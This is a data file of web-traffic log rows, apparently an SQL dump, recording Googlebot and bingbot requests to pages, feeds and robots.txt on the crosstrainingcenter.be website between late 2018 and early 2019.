(78384, 1546218176.154801, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78385, 1546218196.771732, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78386, 1546218801.779255, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78387, 1546218819.273995, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78388, 1546238702.706006, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78389, 1546273089.353265, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78390, 1546362642.815489, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78391, 1546531468.306759, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78392, 1546531468.841825, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78393, 1546606629.666518, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78394, 1546630261.363604, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78395, 1546684322.853727, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78396, 1546855278.359871, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78397, 1546855279.014810, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78398, 1546908382.195014, 2637637410, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78399, 1546956379.343869, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78400, 1546956379.826459, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78401, 1547085619.971471, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78402, 1547159152.195615, 1123631813, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/wyelofyg.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78403, 1547160754.477019, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78404, 1547192184.825578, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78405, 1547192185.458127, 1123631653, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78406, 1547226691.027499, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78407, 1547231491.834506, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78408, 1547233910.740305, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78409, 1547247762.988531, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78410, 1547260431.181357, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78411, 1547296543.911342, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78412, 1547296544.437238, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78413, 1547654155.951045, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78414, 1547654156.497778, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78415, 1547662018.367423, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78416, 1547666230.908283, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78417, 1547682562.763289, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78418, 1547751385.704593, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78419, 1547751386.346738, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78420, 1547793725.869276, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78421, 1547846030.944582, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78422, 1547846031.580334, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78423, 1548113021.237414, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78424, 1548244025.281000, 1123631269, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78425, 1548244025.913665, 1123631269, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78426, 1548246424.903451, 1123631295, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78427, 1548246425.549684, 1123631295, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78428, 1548251291.052042, 1123631269, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78429, 1548258581.738221, 1123631269, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78430, 1548259803.408045, 1123631269, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78431, 1548286729.888189, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78432, 1548295229.969202, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78433, 1548297031.667492, 1123631525, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78434, 1548323395.434564, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78435, 1548407376.180985, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78436, 1548458535.677561, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/pwnxqppij.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78437, 1548797522.957476, 1123634975, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78438, 1548797523.554717, 1123634975, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78439, 1548807743.408764, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78440, 1548807743.922352, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78441, 1548812556.751972, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78442, 1548849318.644702, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78443, 1548980734.051096, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78444, 1548994266.977415, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78445, 1549122680.272839, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78446, 1549176977.428043, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78447, 1549205129.489533, 1123633932, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78448, 1549205130.955262, 1123633932, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78449, 1549226793.685962, 1123631269, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78450, 1549226794.186897, 1123631269, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78451, 1549362880.817646, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78452, 1549362881.372423, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78453, 1549759792.718553, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78454, 1549759834.620730, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78455, 1549797748.741009, 1123631557, 0, 0, 1, 0, 1, 'https://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78456, 1549797749.329565, 1123631557, 0, 1, 1, 0, 1, 'https://www2.crosstrainingcenter.be/.well-known/assetlinks.json', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78457, 1549816473.147778, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78458, 1549845286.267289, 1123634948, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hwyluhdsmmylayin.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78459, 1549852171.636715, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78460, 1549852172.164450, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78461, 1549852419.480855, 1123634948, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78462, 1549873239.086214, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78463, 1549886201.105505, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78464, 1549922890.670604, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78465, 1549927138.604396, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78466, 1550368651.181237, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78467, 1550368651.713337, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78468, 1550374130.716577, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78469, 1550459825.233484, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78470, 1550459825.740284, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78471, 1550460018.300791, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78472, 1550460033.598298, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78473, 1550460046.451137, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78474, 1550460062.906342, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78475, 1550460127.295375, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78476, 1550502985.777775, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78477, 1550548294.177009, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78478, 1550548294.932282, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78479, 1550588172.683780, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
